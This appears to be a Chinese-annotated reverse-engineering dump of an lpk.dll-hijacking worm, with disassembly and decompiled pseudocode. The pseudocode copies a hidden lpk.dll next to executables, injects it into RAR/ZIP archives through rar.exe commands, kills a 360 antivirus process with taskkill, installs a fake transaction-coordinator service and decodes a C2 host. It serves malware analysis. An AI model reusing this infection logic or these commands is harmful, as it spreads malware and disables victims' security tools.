.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID 
lpReserved)
.text:10001A32                 public DllEntryPoint
.text:10001A32 DllEntryPoint   proc near
.text:10001A32
.text:10001A32 hLibModule      = dword ptr  4
.text:10001A32 fdwReason       = dword ptr  8
.text:10001A32 lpReserved      = dword ptr  0Ch
.text:10001A32
.text:10001A32                 cmp     [esp+fdwReason], 1
.text:10001A37                 push    esi
.text:10001A38                 jnz     short loc_10001AA9
.text:10001A3A                 mov     esi, [esp+4+hLibModule]
.text:10001A3E                 push    104h            ; nSize
.text:10001A43                 push    offset ExistingFileName ; lpFilename
.text:10001A48                 push    esi             ; hModule
.text:10001A49                 mov     dword_10003290, esi
.text:10001A4F                 call    ds:GetModuleFileNameW
.text:10001A55                 push    esi             ; hLibModule
.text:10001A56                 call    ds:DisableThreadLibraryCalls
.text:10001A5C                 call    GetMutexName
.text:10001A61                 cmp     eax, 1
.text:10001A64                 jnz     short loc_10001AA2
.text:10001A66                 call    IsVirusKernelFile  ;用来判断是否由病毒核
心进程释放
.text:10001A6B                 test    eax, eax
.text:10001A6D                 jnz     short loc_10001A7D
.text:10001A6F                 call    CreateMutex
.text:10001A74                 test    eax, eax
.text:10001A76                 jnz     short loc_10001A7D
.text:10001A78                 call    ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D:                           ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D                                         ; DllEntryPoint+44j
.text:10001A7D                 call    IsCurrentFileLpk
.text:10001A82                 cmp     eax, 1
.text:10001A85                 jnz     short loc_10001AA2
.text:10001A87                 push    0               ; lpName
.text:10001A89                 push    0               ; bInitialState
.text:10001A8B                 push    eax             ; bManualReset
.text:10001A8C                 push    0               ; lpEventAttributes
.text:10001A8E                 call    ds:CreateEventW
.text:10001A94                 mov     hHandle, eax
.text:10001A99                 test    eax, eax
.text:10001A9B                 jz      short loc_10001AA2
.text:10001A9D                 call    StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2:                           ; CODE XREF: DllEntryPoint+32j
.text:10001AA2                                         ; DllEntryPoint+53j ...
.text:10001AA2                 call    InitLpk
.text:10001AA7                 jmp     short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------

009119E6 <lpk11.StartThread>  /$  56            push    esi
009119E7                      |.  33F6          xor     esi, esi
009119E9                      |.  56            push    esi                              ; 
/pThreadId => NULL
009119EA                      |.  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
009119EC                      |.  56            push    esi                              ; |
pThreadParm => NULL
009119ED                      |.  68 D3189100   push    <FuckAllDisk>                    ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2                      |.  56            push    esi                              ; |
StackSize => 0
009119F3                      |.  56            push    esi                              ; |
pSecurity => NULL
009119F4                      |.  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread
009118D3 <lpk11.FuckAllDisk>   .  81EC C4000000 sub     esp, 0C4
009118D9                       .  53            push    ebx
009118DA                       .  55            push    ebp
009118DB                       .  56            push    esi
009118DC                       .  57            push    edi
009118DD                       .  6A 60         push    60                               ; 
/Length = 60 (96.)
009118DF                       .  8D4424 78     lea     eax, dword ptr [esp+78]          ; |
009118E3                       .  50            push    eax                              ; |
Destination
009118E4                       .  33FF          xor     edi, edi                         ; |
009118E6                       .  FF15 34209100 call    dword ptr [<&KERNEL32.RtlZeroMem>; 
\RtlZeroMemory
009118EC                       >  6A 02         push    2
009118EE                       .  5B            pop     ebx
009118EF                       .  8D6C24 74     lea     ebp, dword ptr [esp+74]
009118F3                       .  C74424 10 180>mov     dword ptr [esp+10], 18
009118FB                       >  837D 00 01    cmp     dword ptr [ebp], 1
009118FF                       .  74 5B         je      short 0091195C
00911901                       .  53            push    ebx
00911902                       .  FF15 B4209100 call    dword ptr [<&SHELL32.#64>]       ;  
shell32.DriveType
00911908                       .  83C0 FE       add     eax, -2
0091190B                       .  83F8 02       cmp     eax, 2                           ;  类
型否为可感染类型？
0091190E                       .  77 4C         ja      short 0091195C
00911910                       .  33C0          xor     eax, eax
00911912                       .  50            push    eax                              ; 
/pThreadId => NULL
00911913                       .  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
00911915                       .  53            push    ebx                              ; |
pThreadParm
00911916                       .  68 77169100   push    <Infect>                         ; |
ThreadFunction = <lpk11.Infect>
0091191B                       .  50            push    eax                              ; |
StackSize => 0
0091191C                       .  50            push    eax                              ; |
pSecurity => NULL
0091191D                       .  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread

signed int __stdcall Infect(LPCWSTR lpString1)
{
  const WCHAR *v2; // eax@17
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17
  v7 = 1;
  if ( WaitForSingleObject(hHandle, 0) != 258 )
    return 0;
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    lstrcpyW(&String2, L"A:\\");
    String2 += (unsigned __int16)lpString1;
  }
  lstrcpyW(&FileName, &String2);
  PathAppendW(&String2, &word_10002374);
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )
    return 1;
  lstrcpyW(&String2, &FileName);
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") 
)
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 )
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") )            // 目录下有exe就将lpk复制过去
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 )
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1);
        SetFileAttributesW(&FileName, 7u);
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 )
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }

DWORD __cdecl InfectCompressFile(int a1)
{
  DWORD result; // eax@1
  wchar_t v2[2]; // eax@3
  UINT v3; // eax@6
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6
  WCHAR PathName; // [sp+410h] [bp-414h]@6
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
  int v8; // [sp+820h] [bp-4h]@1
  v8 = 520;
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, 
&FileName, &v8);
  if ( !result )
  {
    if ( FileName == 34 )
    {
      lstrcpyW(&FileName, &String2);
      *(_DWORD *)v2 = L"\"";
    }
    else
    {
      *(_DWORD *)v2 = L" ";
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0;
      PathRemoveFileSpecW(&FileName);
      PathAppendW(&FileName, L"rar.exe");
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )
      {
        PathGetShortPath(&FileName);
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
          &FileName,
          a1,
          &PathName);
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )
        {
          wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1, 
&PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u);
          Infect(&PathName);
          wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName, 
&PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u);
          wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}

FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA

00403600   $  FF05 0000AF00 inc     dword ptr [AF0000]

00403636   .- FF25 E08D4000 jmp     dword ptr [408DE0]               ;  USER32.LoadIconA
0040363C   $  51            push    ecx
0040363D   .  52            push    edx
0040363E   .  68 DC8D4000   push    00408DDC
00403643   .^ E9 E0FFFFFF   jmp     00403628
00403648   .- FF25 DC8D4000 jmp     dword ptr [408DDC]               ;  USER32.wsprintfA
0040364E   $  51            push    ecx
0040364F   .  52            push    edx
00403650   .  68 D88D4000   push    00408DD8
00403655   .^ E9 CEFFFFFF   jmp     00403628
0040365A   .- FF25 D88D4000 jmp     dword ptr [408DD8]               ;  
USER32.GetDesktopWindow
00403660   $  51            push    ecx
00403661   .  52            push    edx
00403662   .  68 E48D4000   push    00408DE4
00403667   .^ E9 BCFFFFFF   jmp     00403628
0040366C   .- FF25 E48D4000 jmp     dword ptr [408DE4]               ;  USER32.SetWindowLongA
00403672   $  51            push    ecx
00403673   .  52            push    edx
00403674   .  68 D08D4000   push    00408DD0
00403679   .^ E9 AAFFFFFF   jmp     00403628
0040367E   .- FF25 D08D4000 jmp     dword ptr [408DD0]               ;  USER32.SendMessageA
00403684   $  51            push    ecx
00403685   .  52            push    edx
00403686   .  68 CC8D4000   push    00408DCC
0040368B   .^ E9 98FFFFFF   jmp     00403628
00403690   .- FF25 CC8D4000 jmp     dword ptr [408DCC]               ;  USER32.DrawIcon
00403696   $  51            push    ecx
00403697   .  52            push    edx
00403698   .  68 C88D4000   push    00408DC8
0040369D   .^ E9 86FFFFFF   jmp     00403628
004036A2   .- FF25 C88D4000 jmp     dword ptr [408DC8]               ;  USER32.GetClientRect
004036A8   .  51            push    ecx
004036A9   .  52            push    edx
004036AA   .  68 C48D4000   push    00408DC4
004036AF   .^ E9 74FFFFFF   jmp     00403628
004036B4   .- FF25 C48D4000 jmp     dword ptr [408DC4]               ;  
USER32.GetSystemMetrics
004036BA   $  51            push    ecx
004036BB   .  52            push    edx
004036BC   .  68 D48D4000   push    00408DD4
004036C1   .^ E9 62FFFFFF   jmp     00403628
004036C6   .- FF25 D48D4000 jmp     dword ptr [408DD4]               ;  USER32.IsIconic
004036CC   $  51            push    ecx
004036CD   .  52            push    edx
004036CE   .  68 E88D4000   push    00408DE8
004036D3   .^ E9 50FFFFFF   jmp     00403628
004036D8   .- FF25 E88D4000 jmp     dword ptr [408DE8]               ;  USER32.EnableWindow
00408DC4  77D18F9C  USER32.GetSystemMetrics
00408DC8  77D2908E  USER32.GetClientRect
00408DCC  77D3D06C  USER32.DrawIcon
00408DD0  77D2F3C2  USER32.SendMessageA
00408DD4  77D297FF  USER32.IsIconic
00408DD8  77D2D1D2  USER32.GetDesktopWindow
00408DDC  77D1A8AD  USER32.wsprintfA
00408DE0  77D2E8F6  USER32.LoadIconA
00408DE4  77D2C29D  USER32.SetWindowLongA
00408DE8  77D29849  USER32.EnableWindow

004036D3   >^/E9 28FFFFFF   jmp     00403600
004036D8   .^|FF25 E88D4000 jmp     dword ptr [408DE8]               ;  ggmqgk.004036CC
004036DE   $ |51            push    ecx
004036DF   . |52            push    edx
004036E0   . |68 AC8D4000   push    00408DAC
004036E5   . |E9 00000000   jmp     004036EA
004036EA   > |68 98694000   push    00406998
004036EF   . |E8 2C020000   call    00403920
004036F4   . |5A            pop     edx
004036F5   . |59            pop     ecx
004036F6   .^\EB DB         jmp     short 004036D3
004036F8   .- FF25 AC8D4000 jmp     dword ptr [408DAC]               ;  advapi32.DeleteService
004036FE   $  51            push    ecx
004036FF   .  52            push    edx
00403700   .  68 B08D4000   push    00408DB0                         ;  ASCII "6L~i"
00403705   .^ E9 E0FFFFFF   jmp     004036EA
0040370A   .- FF25 B08D4000 jmp     dword ptr [408DB0]               ;  advapi32.OpenServiceA
00403710   $  51            push    ecx
00403711   .  52            push    edx
00403712   .  68 B48D4000   push    00408DB4                         ;  ASCII "~i"
00403717   .^ E9 CEFFFFFF   jmp     004036EA
0040371C   .- FF25 B48D4000 jmp     dword ptr [408DB4]               ;  
advapi32.OpenSCManagerA
00403722   $  51            push    ecx
00403723   .  52            push    edx
00403724   .  68 A88D4000   push    00408DA8
00403729   .^ E9 BCFFFFFF   jmp     004036EA
0040372E   .- FF25 A88D4000 jmp     dword ptr [408DA8]               ;  advapi32.RegCloseKey
00403734   $  51            push    ecx
00403735   .  52            push    edx
00403736   .  68 A48D4000   push    00408DA4
0040373B   .^ E9 AAFFFFFF   jmp     004036EA
00403740   .- FF25 A48D4000 jmp     dword ptr [408DA4]               ;  
advapi32.RegQueryValueExA
00403746   $  51            push    ecx
00403747   .  52            push    edx
00403748   .  68 A08D4000   push    00408DA0
0040374D   .^ E9 98FFFFFF   jmp     004036EA
00403752   .- FF25 A08D4000 jmp     dword ptr [408DA0]               ;  advapi32.RegOpenKeyExA
00403758   .  51            push    ecx
00403759   .  52            push    edx
0040375A   .  68 9C8D4000   push    00408D9C
0040375F   .^ E9 86FFFFFF   jmp     004036EA
00403764   .- FF25 9C8D4000 jmp     dword ptr [408D9C]               ;  
advapi32.SetServiceStatus
0040376A   $  51            push    ecx
0040376B   .  52            push    edx
0040376C   .  68 988D4000   push    00408D98
00403771   .^ E9 74FFFFFF   jmp     004036EA
00403776   .- FF25 988D4000 jmp     dword ptr [408D98]               ;  
advapi32.RegisterServiceCtrlHandlerA
0040377C   $  51            push    ecx
0040377D   .  52            push    edx
0040377E   .  68 948D4000   push    00408D94
00403783   .^ E9 62FFFFFF   jmp     004036EA
00403788   .- FF25 948D4000 jmp     dword ptr [408D94]               ;  
advapi32.StartServiceCtrlDispatcherA
0040378E   $  51            push    ecx
0040378F   .  52            push    edx
00403790   .  68 908D4000   push    00408D90
00403795   .^ E9 50FFFFFF   jmp     004036EA
0040379A   .- FF25 908D4000 jmp     dword ptr [408D90]               ;  
advapi32.CloseServiceHandle
004037A0   $  51            push    ecx
004037A1   .  52            push    edx
004037A2   .  68 8C8D4000   push    00408D8C
004037A7   .^ E9 3EFFFFFF   jmp     004036EA
004037AC   .- FF25 8C8D4000 jmp     dword ptr [408D8C]               ;  
advapi32.RegSetValueExA
004037B2   $  51            push    ecx
004037B3   .  52            push    edx
004037B4   .  68 888D4000   push    00408D88
004037B9   .^ E9 2CFFFFFF   jmp     004036EA
004037BE   .- FF25 888D4000 jmp     dword ptr [408D88]               ;  advapi32.RegOpenKeyA
004037C4   $  51            push    ecx
004037C5   .  52            push    edx
004037C6   .  68 808D4000   push    00408D80
004037CB   .^ E9 1AFFFFFF   jmp     004036EA
004037D0   .- FF25 808D4000 jmp     dword ptr [408D80]               ;  advapi32.StartServiceA
004037D6   $  51            push    ecx
004037D7   .  52            push    edx
004037D8   .  68 848D4000   push    00408D84
004037DD   .^ E9 08FFFFFF   jmp     004036EA
004037E2   .- FF25 848D4000 jmp     dword ptr [408D84]               ;  
advapi32.CreateServiceA
00408D80  77DBFB38  advapi32.StartServiceA
00408D84  77E071E9  advapi32.CreateServiceA
00408D88  77DAEFB8  advapi32.RegOpenKeyA
00408D8C  77DAEAD7  advapi32.RegSetValueExA
00408D90  77DB6CC5  advapi32.CloseServiceHandle
00408D94  77E07EB1  advapi32.StartServiceCtrlDispatcherA
00408D98  77DC4E96  advapi32.RegisterServiceCtrlHandlerA
00408D9C  77DC3231  advapi32.SetServiceStatus
00408DA0  77DA7842  advapi32.RegOpenKeyExA
00408DA4  77DA7AAB  advapi32.RegQueryValueExA
00408DA8  77DA6C17  advapi32.RegCloseKey
00408DAC  77E07489  advapi32.DeleteService
00408DB0  77DC4C36  advapi32.OpenServiceA
00408DB4  77DC697E  advapi32.OpenSCManagerA

.text:004029E0 ; =============== S U B R O U T I N E =======================================
.text:004029E0
.text:004029E0 ; Attributes: bp-based frame
.text:004029E0
.text:004029E0 OnInit          proc near               ; DATA XREF: .rdata:00406474o
.text:004029E0
.text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004029E0 var_8           = dword ptr -8
.text:004029E0 var_4           = dword ptr -4
.text:004029E0
.text:004029E0                 push    ebp
.text:004029E1 ; 8:   v1 = this;
.text:004029E1                 mov     ebp, esp
.text:004029E3                 sub     esp, 10h
.text:004029E6                 push    esi
.text:004029E7                 push    edi
.text:004029E8                 mov     esi, ecx
.text:004029EA ; 9:   CDialog__OnInitDialog();
.text:004029EA                 call    ?OnInitDialog@CDialog@@UAEHXZ ; CDialog::OnInitDialog
(void)
.text:004029EF ; 10:   SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24));
.text:004029EF                 mov     eax, [esi+60h]
.text:004029F2                 mov     ecx, [esi+20h]
.text:004029F5                 mov     edi, SendMessageA
.text:004029FB                 push    eax             ; lParam
.text:004029FC                 push    1               ; wParam
.text:004029FE                 push    80h             ; Msg
.text:00402A03                 push    ecx             ; hWnd
.text:00402A04                 call    edi ; SendMessageA
.text:00402A06 ; 11:   SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24));
.text:00402A06                 mov     edx, [esi+60h]
.text:00402A09                 mov     eax, [esi+20h]
.text:00402A0C                 push    edx             ; lParam
.text:00402A0D                 push    0               ; wParam
.text:00402A0F                 push    80h             ; Msg
.text:00402A14                 push    eax             ; hWnd
.text:00402A15                 call    edi ; SendMessageA
.text:00402A17 ; 12:   if ( v1 )
.text:00402A17                 test    esi, esi
.text:00402A19                 jnz     short loc_402A1F
.text:00402A1B ; 15:     v2 = 0;
.text:00402A1B                 xor     eax, eax
.text:00402A1D                 jmp     short loc_402A22
.text:00402A1F ; ---------------------------------------------------------------------------
.text:00402A1F ; 13:     v2 = (HWND)*((_DWORD *)v1 + 8);
.text:00402A1F
.text:00402A1F loc_402A1F:                             ; CODE XREF: OnInit+39j
.text:00402A1F                 mov     eax, [esi+20h]
.text:00402A22 ; 16:   SetWindowLongA(v2, -20, 128);
.text:00402A22
.text:00402A22 loc_402A22:                             ; CODE XREF: OnInit+3Dj
.text:00402A22                 push    80h             ; dwNewLong
.text:00402A27                 push    0FFFFFFECh      ; nIndex
.text:00402A29                 push    eax             ; hWnd
.text:00402A2A                 call    SetWindowLongA
.text:00402A30 ; 17:   CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1);
.text:00402A30                 push    1
.text:00402A32                 push    0
.text:00402A34                 push    0
.text:00402A36                 push    0FFFFFF9Ch
.text:00402A38                 push    0FFFFFF9Ch
.text:00402A3A                 push    0
.text:00402A3C                 mov     ecx, esi
.text:00402A3E                 call    ?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z ; 
CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
.text:00402A43 ; 18:   WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0);// - -这种方法也能杀
掉？作者脑子里进屎了、
.text:00402A43                 nop
.text:00402A44                 nop
.text:00402A45                 nop
.text:00402A46                 nop
.text:00402A47                 nop
.text:00402A48                 nop
.text:00402A49                 nop
.text:00402A4A                 nop
.text:00402A4B                 nop
.text:00402A4C                 nop
.text:00402A4D                 nop
.text:00402A4E                 nop
.text:00402A4F                 nop
.text:00402A50                 nop
.text:00402A51                 nop
.text:00402A52                 nop
.text:00402A53                 nop
.text:00402A54                 nop
.text:00402A55                 nop
.text:00402A56                 push    0               ; uCmdShow
.text:00402A58                 push    offset CmdLine  ; "taskkill /f /im ZhuDongFangYu.exe 
/t"
.text:00402A5D                 call    ds:WinExec
.text:00402A63 ; 19:   if ( RegOpenKey() )
.text:00402A63                 call    RegOpenKey
.text:00402A68                 pop     edi
.text:00402A69                 pop     esi
.text:00402A6A                 test    eax, eax
.text:00402A6C                 jz      short loc_402A9D
.text:00402A6E ; 21:     ServiceStartTable.lpServiceName = "Distribuvbf";
.text:00402A6E                 lea     ecx, [ebp+ServiceStartTable]
.text:00402A71                 mov     [ebp+ServiceStartTable.lpServiceName], offset 
ServiceName ; "Distribuvbf"
.text:00402A78 ; 22:     ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)
sub_402730;
.text:00402A78                 push    ecx             ; lpServiceStartTable
.text:00402A79                 mov     [ebp+ServiceStartTable.lpServiceProc], offset 
sub_402730
.text:00402A80 ; 23:     v5 = 0;
.text:00402A80                 mov     [ebp+var_8], 0
.text:00402A87 ; 24:     v6 = 0;
.text:00402A87                 mov     [ebp+var_4], 0
.text:00402A8E ; 25:     StartServiceCtrlDispatcherA(&ServiceStartTable);
.text:00402A8E                 call    StartServiceCtrlDispatcherA ; 存在就直接启动
.text:00402A94 ; 39:   return 1;
.text:00402A94
.text:00402A94 loc_402A94:                             ; CODE XREF: OnInit+DBj
.text:00402A94                 mov     eax, 1
.text:00402A99                 mov     esp, ebp
.text:00402A9B                 pop     ebp
.text:00402A9C                 retn
.text:00402A9D ; ---------------------------------------------------------------------------
.text:00402A9D ; 29:     sub_402B40(
.text:00402A9D ; 30:       "Distribuvbf",
.text:00402A9D ; 31:       "Distribuihd Transaction Coordinator Service",
.text:00402A9D ; 32:       "Distribucha Transaction Coordinator Service.");
.text:00402A9D
.text:00402A9D loc_402A9D:                             ; CODE XREF: OnInit+8Cj
.text:00402A9D                 push    offset Data     ; "Distribucha Transaction Coordinator 
Ser"...
.text:00402AA2                 push    offset DisplayName ; "Distribuihd Transaction 
Coordinator Ser"...
.text:00402AA7                 push    offset ServiceName ; "Distribuvbf"
.text:00402AAC                 call    RegServiceAndStart
.text:00402AB1 ; 33:     if ( dword_409388 )
.text:00402AB1                 mov     eax, dword_409388 ; 失败了就退出……
.text:00402AB6                 add     esp, 0Ch
.text:00402AB9                 test    eax, eax
.text:00402ABB                 jz      short loc_402A94
.text:00402ABD ; 35:       sub_402330();
.text:00402ABD                 call    MoveFile        ; 0012F65C   0012F784  |NewName = "C:
\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
.text:00402AC2 ; 36:       ExitProcess(0);
.text:00402AC2                 push    0               ; uExitCode
.text:00402AC4                 call    ds:ExitProcess
.text:00402AC4 OnInit          endp

.text:004027E6 ; 20:   lpkInfect();
.text:004027E6
.text:004027E6 loc_4027E6:                             ; CODE XREF: sub_402730+A9j
.text:004027E6                 call    lpkInfect
.text:004027EB ; 21:   wsprintfA(&v0, "hra%u.dll", 33);
.text:004027EB                 push    21h
.text:004027ED                 lea     ecx, [esp+14h]
.text:004027F1                 push    offset aHraU_dll ; "hra%u.dll"
.text:004027F6                 push    ecx             ; LPSTR
.text:004027F7                 call    wsprintfA
.text:004027FD ; 22:   sub_402520(&v0);
.text:004027FD                 lea     edx, [esp+1Ch]
.text:00402801                 push    edx             ; pFileName
.text:00402802                 call    sub_402520
.text:00402807 ; 23:   LoadVirusLpk();
.text:00402807                 call    LoadVirusLpk
.text:0040280C ; 24:   decode((int)"s3344P?>6>6", strlen("s3344P?>6>6") - 1, 18);
.text:0040280C                 mov     edi, offset aSgtlp3344pptz66 ; ;  ASCII 
"scrk.3322.org:8080"
.text:0040280C                                         ; 解密以后的字符串
.text:00402811                 or      ecx, 0FFFFFFFFh
.text:00402814                 xor     eax, eax
.text:00402816                 push    12h
.text:00402818                 repne scasb
.text:0040281A                 not     ecx
.text:0040281C                 dec     ecx
.text:0040281D                 push    ecx
.text:0040281E                 push    offset aSgtlp3344pptz66 ; "s3344P?>6>6"
.text:00402823                 call    decode
.text:00402828 ; 25:   WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16));
.text:00402828                 add     esp, 1Ch
.text:0040282B                 lea     eax, [esp+294h+WSAData.szDescription+0Ch]
.text:00402832                 push    eax             ; lpWSAData
.text:00402833                 push    202h            ; wVersionRequested
.text:00402838                 call    WSAStartup
.text:0040283E                 mov     edi, ds:WaitForSingleObject
.text:00402844                 mov     ebx, ds:CloseHandle
.text:0040284A                 mov     ebp, closesocket
.text:00402850 ; 28:     hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0);我对臭苹
果的怨念是世界级的……
.text:00402850
.text:00402850 loc_402850:                             ; CODE XREF: sub_402730+159j
.text:00402850                 push    0               ; lpParameter
.text:00402852                 push    offset bAdApple ; lpStartAddress
.text:00402857                 call    CreateThraed
.text:0040285C ; 29:     WaitForSingleObject(hObject, 0xFFFFFFFFu);
.text:0040285C                 push    0FFFFFFFFh      ; dwMilliseconds
.text:0040285E ; 26:   while ( 1 )
.text:0040285E                 push    eax             ; hHandle
.text:0040285F                 mov     hObject, eax
.text:00402864                 call    edi ; WaitForSingleObject
.text:00402866 ; 30:     CloseHandle(hObject);
.text:00402866                 mov     ecx, hObject
.text:0040286C                 push    ecx             ; hObject
.text:0040286D                 call    ebx ; CloseHandle
.text:0040286F ; 31:     closesocket(s);
.text:0040286F                 mov     edx, s
.text:00402875                 push    edx             ; s
.text:00402876                 call    ebp ; closesocket
.text:00402878 ; 33:     Sleep(0x12Cu);
.text:00402878                 push    12Ch            ; dwMilliseconds
.text:0040287D ; 32:     dword_408634 = 1;
.text:0040287D                 mov     dword_408634, 1
.text:00402887                 call    esi ; Sleep
.text:00402889                 jmp     short loc_402850